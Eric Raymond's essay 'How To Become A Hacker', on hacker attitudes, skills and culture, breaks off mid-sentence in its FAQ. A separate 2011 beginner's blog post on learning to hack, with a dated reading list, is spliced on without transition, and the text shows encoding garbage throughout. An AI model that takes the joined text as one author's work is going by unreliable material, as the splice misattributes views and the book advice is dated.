As editor of the Jargon File and author of a few other well-known documents of similar nature, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizardly hacker?". Back in 1996 I noticed that there didn't seem to be any other FAQs or web documents that addressed this vital question, so I started this one. A lot of hackers now consider it definitive, and I suppose that means it is. Still, I don't claim to be the exclusive authority on this topic; if you don't like what you read here, write your own.
If you are reading a snapshot of this document offline, the current version lives at http://catb.org/~esr/faqs/hacker-howto.html.
Note: there is a list of Frequently Asked Questions at the end of this document. Please read theseâ€”twiceâ€”before mailing me any questions about this document.
Numerous translations of this document are available: Arabic Chinese (Simplified), Danish, Dutch, Estonian, German, Greek Italian Hebrew, Norwegian, Portuguese (Brazilian), Romanian Spanish, Turkish, and Swedish. Note that since this document changes occasionally, they may be out of date to varying degrees.
The five-dots-in-nine-squares diagram that decorates this document is called a glider. It is a simple pattern with some surprising properties in a mathematical simulation called Life that has fascinated hackers for many years. I think it makes a good visual emblem for what hackers are like â€” abstract, at first a bit mysterious-seeming, but a gateway to a whole world with an intricate logic of its own. Read more about the glider emblem here.

What Is a Hacker?

The Jargon File contains a bunch of definitions of the term â€˜hackerâ€™, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.
There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term â€˜hackerâ€™. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.
The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music â€” actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them â€˜hackersâ€™ too â€” and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term â€˜hackerâ€™.
There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people â€˜crackersâ€™ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word â€˜hackerâ€™ to describe crackers; this irritates real hackers no end.
The basic difference is this: hackers build things, crackers break them.
If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.
2. No problem should ever have to be solved twice.
3. Boredom and drudgery are evil.
4. Freedom is good.
5. Attitude is no substitute for competence.

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.
But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you â€” for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters â€” not just intellectually but emotionally as well.
Or, as the following modern Zen poem has it:

Â Â Â Â ToÂ followÂ theÂ path:
Â Â Â Â lookÂ toÂ theÂ master,
Â Â Â Â followÂ theÂ master,
Â Â Â Â walkÂ withÂ theÂ master,
Â Â Â Â seeÂ throughÂ theÂ master,
Â Â Â Â becomeÂ theÂ master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.
If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.
(You also have to develop a kind of faith in your own learning capacity â€” a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece â€” and so on, until you're done.)

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.
To behave like a hacker, you have to believe that the thinking time of other hackers is precious â€” so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.
(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do â€” solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).
(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice â€” nobody who can think should ever be forced into a situation that bores them.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by â€” and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.
(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing â€” they only like â€˜cooperationâ€™ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.
Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence â€” especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.
If you revere competence, you'll enjoy developing it in yourself â€” the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

Basic Hacking Skills

1. Learn how to program.
2. Get one of the open-source Unixes and learn to use and run it.
3. Learn how to use the World Wide Web and write HTML.
4. If you don't have functional English, learn it.

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.
This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.
I used to recommend Java as a good language to learn early, but this critique has changed my mind (search for â€œThe Pitfalls of Java as a First Programming Languageâ€ within it). A hacker cannot, as they devastatingly put it â€œapproach problem-solving like a plumber in a hardware storeâ€; you have to know what the components actually do. Now I think it is probably best to learn C and Lisp first, then Java.
There is perhaps a more general point here. If a language does too much for you, it may be simultaneously a good tool for production and a bad one for learning. It's not only languages that have this problem; web application frameworks like RubyOnRails, CakePHP, Django may make it too easy to reach a superficial sort of understanding that will leave you without resources when you have to tackle a hard problem, or even just debug the solution to an easy one.
If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.
C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff â€” it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python.
Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code.
LISP is worth learning for a different reason â€” the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)
It's best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.
But be aware that you won't reach the skill level of a hacker or even merely a programmer simply by accumulating languages â€” you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.
I can't give complete instructions on how to learn to program here â€” it's a complex skill. But I can tell you that books and courses won't do it â€” many, maybe most of the best hackers are self-taught. You can learn language features â€” bits of knowledge â€” from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.
Peter Norvig, who is one of Google's top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called Teach Yourself Programming in Ten Years. His "recipe for programming success" is worth careful attention.
Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.
Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...

2. Get one of the open-source Unixes and learn to use and run it.

I'll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes or OpenSolaris, install it on a personal machine, and run it.
Yes, there are other operating systems in the world besides Unix. But they're distributed in binary â€” you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.
Under Mac OS X it's possible, but only part of the system is open source â€” you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.
Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)
So, bring up a Unix â€” I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.
For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.
To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.
During the first ten years of this HOWTO's life, I reported that from a new user's point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged: Ubuntu. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies.
You can find BSD Unix help and resources at www.bsd.org.
A good way to dip your toes in the water is to boot up what Linux fans call a live CD, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it's a way to get a look at the possibilities without having to do anything drastic.
I have written a primer on the basics of Unix and the Internet.
I used to recommend against installing either Linux or BSD as a solo project if you're a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible, even for a newbie. Nevertheless, I still recommend making contact with your local Linux user's group and asking for help. It can't hurt, and may smooth the process.

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.
This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.)
But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge â€” very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).
To be worthwhile, your page must have content â€” it must be interesting and/or useful to other hackers. And that brings us to the next topic...

4. If you don't have functional English, learn it.

As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.
Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).
Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following.
Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we've generally found the correlation to be strong â€” and we have no use for sloppy thinkers. If you can't yet write competently, learn to.

Status in the Hacker Culture

1. Write open-source software
2. Help test and debug open-source software
3. Publish useful information
4. Help keep the infrastructure working
5. Serve the hacker culture itself

Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.
Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one's motivation at all.
Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.
There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.
(We used to call these works â€œfree softwareâ€, but this confused too many people who weren't sure exactly what â€œfreeâ€ was supposed to mean. Most of us now prefer the term â€œopen-sourceâ€ software).
Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.
But there's a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community's hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, "the hacker community" and "open-source developers" are two descriptions for what is essentially the same culture and population â€” but it is worth remembering that this was not always so. (For more on this, see the section called â€œHistorical Note: Hacking, Open Source, and Free Softwareâ€.)

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.
If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.
Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going â€” administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.
People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things.
The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.
For this reason, many hackers have adopted the label â€˜geekâ€™ as a badge of pride â€” it's a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term 'nerd' used to be used this way back in the 1990s, back when 'nerd' was a mild pejorative and 'geek' a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren't techies.
If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.
If you're attracted to hacking because you don't have a life, that's OK too â€” at least you won't have trouble concentrating. Maybe you'll get a life later on.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.
Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.
Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.
Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.
Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills â€” system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.
Finally, a few things not to do.

Don't use a silly, grandiose user ID or screen name.
Don't get in flame wars on Usenet (or anywhere else).
Don't call yourself a â€˜cyberpunkâ€™, and don't waste your time on anybody who does.
Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories â€” it could take you years to live your early blunders down enough to be accepted.
The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.

Historical Note: Hacking, Open Source, and Free Software

When I originally wrote this how-to in late 1996, some of the conditions around it were very different from the way they look today. A few words about these changes may help clarify matters for people who are confused about the relationship of open source, free software, and Linux to the hacker community. If you are not curious about this, you can skip straight to the FAQ and bibliography from here.
The hacker ethos and community as I have described it here long predates the emergence of Linux after 1990; I first became involved with it around 1976, and, its roots are readily traceable back to the early 1960s. But before Linux, most hacking was done on either proprietary operating systems or a handful of quasi-experimental homegrown systems like MIT's ITS that were never deployed outside of their original academic niches. While there had been some earlier (pre-Linux) attempts to change this situation, their impact was at best very marginal and confined to communities of dedicated true believers which were tiny minorities even within the hacker community, let alone with respect to the larger world of software in general.
What is now called "open source" goes back as far as the hacker community does, but until 1985 it was an unnamed folk practice rather than a conscious movement with theories and manifestos attached to it. This prehistory ended when, in 1985, arch-hacker Richard Stallman ("RMS") tried to give it a name â€” "free software". But his act of naming was also an act of claiming; he attached ideological baggage to the "free software" label which much of the existing hacker community never accepted. As a result, the "free software" label was loudly rejected by a substantial minority of the hacker community (especially among those associated with BSD Unix), and used with serious but silent reservations by a majority of the remainder (including myself).
Despite these reservations, RMS's claim to define and lead the hacker community under the "free software" banner broadly held until the mid-1990s. It was seriously challenged only by the rise of Linux. Linux gave open-source development a natural home. Many projects issued under terms we would now call open-source migrated from proprietary Unixes to Linux. The community around Linux grew explosively, becoming far larger and more heterogenous than the pre-Linux hacker culture. RMS determinedly attempted to co-opt all this activity into his "free software" movement, but was thwarted by both the exploding diversity of the Linux community and the public skepticism of its founder, Linus Torvalds. Torvalds continued to use the term "free software" for lack of any alternative, but publicly rejected RMS's ideological baggage. Many younger hackers followed suit.
In 1996, when I first published this Hacker HOWTO, the hacker community was rapidly reorganizing around Linux and a handful of other open-source operating systems (notably those descended from BSD Unix). Community memory of the fact that most of us had spent decades developing closed-source software on closed-source operating systems had not yet begun to fade, but that fact was already beginning to seem like part of a dead past; hackers were, increasingly, defining themselves as hackers by their attachments to open-source projects such as Linux or Apache.
The term "open source", however, had not yet emerged; it would not do so until early 1998. When it did, most of hacker community adopted it within the following six months; the exceptions were a minority ideologically attached to the term "free software". Since 1998, and especially after about 2003, the identification of 'hacking' with 'open-source (and free software) development' has become extremely close. Today there is little point in attempting to distinguish between these categories, and it seems unlikely that will change in the future.
It is worth remembering, however, that this was not always so.

Other Resources

Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.
There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.
I have also written A Brief History Of Hackerdom.
I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere.
Rick Moen has written an excellent document on how to run a Linux user group.
Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it.
If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO.
When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO.
If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo.

Frequently Asked Questions

Q: How do I tell if I am already a hacker?
Q: Will you teach me how to hack?
Q: How can I get started, then?
Q: When do you have to start? Is it too late for me to learn?
Q: How long will it take me to learn to hack?
Q: Is Visual Basic a good language to start with?
Q: Would you help me to crack a system, or teach me how to crack?
Q: How can I get the password for someone else's account?
Q: How can I break into/read/monitor someone else's email?
Q: How can I steal channel op privileges on IRC?
Q: I've been cracked. Will you help me fend off further attacks?
Q: I'm having problems with my Windows software. Will you help me?
Q: Where can I find some real hackers to talk with?
Q: Can you recommend useful books about hacking-related subjects?
Q: Do I need to be good at math to become a hacker?
Q: What language should I learn first?
Q: What kind of hardware do I need?
Q: I want to contribute. Can you help me pick a problem to work on?
Q: Do I need to hate and bash Microsoft?
Q: But won't open-source software leave programmers unable to make a living?
Q: Where can I get a free Unix?

How do I tell if I am already a hacker?

Ask yourself the following three questions:

Do you speak code, fluently?
Do you identify with the goals and values of the hacker community?
Has a well-established member of the hacker community ever called you a hacker?

If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient.
The first test is about skills. You probably pass it if you have the minimum technical skills described earlier in this document. You blow right through it if you have had a substantial amount of code accepted by an open-source development project.
The second test is about attitude. If the five principles of the hacker mindset seemed obvious to you, more like a description of the way you already live than anything novel, you are already halfway to passing it. That's the inward half; the other, outward half is the degree to which you identify with the hacker community's long-term projects.
Here is an incomplete but indicative list of some of those projects: Does it matter to you that Linux improve and spread? Are you passionate about software freedom? Hostile to monopolies? Do you act on the belief that computers can be instruments of empowerment that make the world a richer and more humane place?
But a note of caution is in order here. The hacker community has some specific, primarily defensive political interests â€” two of them are defending free-speech rights and fending off "intellectual-property" power grabs that would make open source illegal. Some of those long-term projects are civil-liberties organizations like the Electronic Frontier Foundation, and the outward attitude properly includes support of them. But beyond that, most hackers view attempts to systematize the hacker attitude into an explicit political program with suspicion; we've learned, the hard way, that these attempts are divisive and distracting. If someone tries to recruit you to march on your capitol in the name of the hacker attitude, they've missed the point. The right response is probably â€œShut up and show them the code.â€
The third test has a tricky element of recursiveness about it. I observed in the section called â€œWhat Is a Hacker?â€ that being a hacker is partly a matter of belonging to a particular subculture or social network with a shared history, an inside and an outside. In the far past,

How To Hack – Beginners Guide to Hacking Computers

2011-04-08T00:07:00.000-07:00

You stay up all night on the PC typing and typing. No, you’re not hacking. You’re begging someone on IRC to teach you how to hack! Let’s look at the facts:

You’re a luser and you’re annoying. No one likes you if you ask others how to hack without taking the least amount of initiative.
You’re not worthy of any title even resembling hacker, cracker, phreaker, etc., so don’t go around calling yourself that! The more you do, the less likely you are to find someone willing to teach you how to hack (which is an infinitesimal chance, any way).
You’re wasting your time (if you couldn’t infer that in the first place). Many real hackers (not those shitty script kiddies) spend all their insomniac hours reading and, yes even, HACKING! (Hacking doesn’t necessarily (but usually does) mean breaking into another system. It could mean just working on your own system, BUT NOT WINDOWS ’9x (unless you’re doing some really menacing registry shit, in which case, you’re kind of cool).)

You’re probably thinking, “Then what should I do. If no one’s going to help me, how can I learn to hack?” Have you ever tried READING (I assume this far that you are literate). Read anything and everything you can get your hands on! I recommend hitting a computer store and looking for discount books (books that are usually out of date, but so are a lot of the systems on the ‘net, so they’re still relevant!). You’ll be surprised what you can learn from a book even when you’re paying a dollar for every hundred pages. I recommend the following books to start off with:

Maximum Security I or II: this is not a guide to hacking, despite what you might have heard, but you can get enough info to learn the basics of how hackers hack! (Isn’t that more fun than being lamed, email bombed, and kicked off IRC).
Practical Unix and Internet Security (Sec. Edition): This is mostly a book about how to secure Unix (if you don’t know what Unix is, either shoot yourself now, or read O’Reilly’s Learning the Unix OS), but half of learning to hack is learning a system from the inside out. How can you expect to hack a site (w/o using a kiddie script, which i must restate, is NOT hacking) if you don’t know how to use the system?!
Linux Unleashed/Red Hat Linux Unleashed: these books are kind of cool. First of all, they come with Red Hat Linux (*sigh*, just go to www.linux.org and read everything there) 5.1 and 5.2 respectively (if you get the newest versions of the book, which you should). Read everything you can from it.
Sendmail in a nutshell: This is only after you read everything else. Sendmail, for those of you who still don’t know, is a program that sends mail. It sounds stupid, but this is a buggy program, and usually is the avenue of attack many hackers take because of it’s vulnerabilities.
TCP/IP Blueprints: this will clear up a lot of things concerning TCP/IP.
TCP/IP Administration: haven’t read it, but can’t wait to! (I’ve been bogged down by a lot of other REAL computer stuff).

Editor’s Note: OK, some of these books are out of date now, so I’ve striked the ones that are no longer relevent. “Hacking Exposed” is a good substitute for “Maximum Security”.

After you’ve read them all, re-read them! Trust me, you gain a ton of information the second time you read them just as you gain perspicacity the second time through a movie with a twisted plot.
Then, read a ton of RFCs. RFCs are Request for Comments by the people who practically shaped the Internet. Here is a good list of RFCs (the books above give about the same list):

Editor’s Note: Yeah, I really wouldn’t bother with the RFC’s, they can come later if you get really seriously into it.

That’s it for now. If anything else interests you about the Internet, try to look up an RFC for it. Read anything you can about Internet security in general (but not stuff like “How to Hack” (but keep reading this!)). Subscribe to mailing lists. Some of my favorites are bugtraq, happy hacker (interesting stuff), and MC2. By now, you should be advanced enough to breeze through Carolyn Meinel’s “Guide to (mostly) Harmless Hacking.” It’s got some interesting stuff, but not enough to be “3l1t3.” Okay, now for the big step: the step from lamer to hacker! If you have not already, install Linux. Now it’s okay for you to go online to usenet groups and ask for help installing Linux, ‘cuz quite frankly, it’s pretty fucking hard! NEVER, EVER, EVER expect to get it on the first try just right.

Editor’s Note: you can install cygwin to start with, it’s a small linux environment that you can run inside windows to get the feel of a shell interface.

The next thing to do is learn programming. I recommend learning C++ first because it will help you understand a lot about programming, it’s easy to use, and is a lot like the other programming languages you should also learn. Read these books:

Teach Yourself C++ in 21 Days: the name says it all
Learning Perl: an AMAZING book on learning Perl
Programming Perl: the next step after Learning Perl
Perl Cookbook: the next step after Programming Perl
Core Java (Volume I & II): these books are by the makers of Java. Java is a really cool language to say the least, but you should at least learn C++ before so you can understand classes.

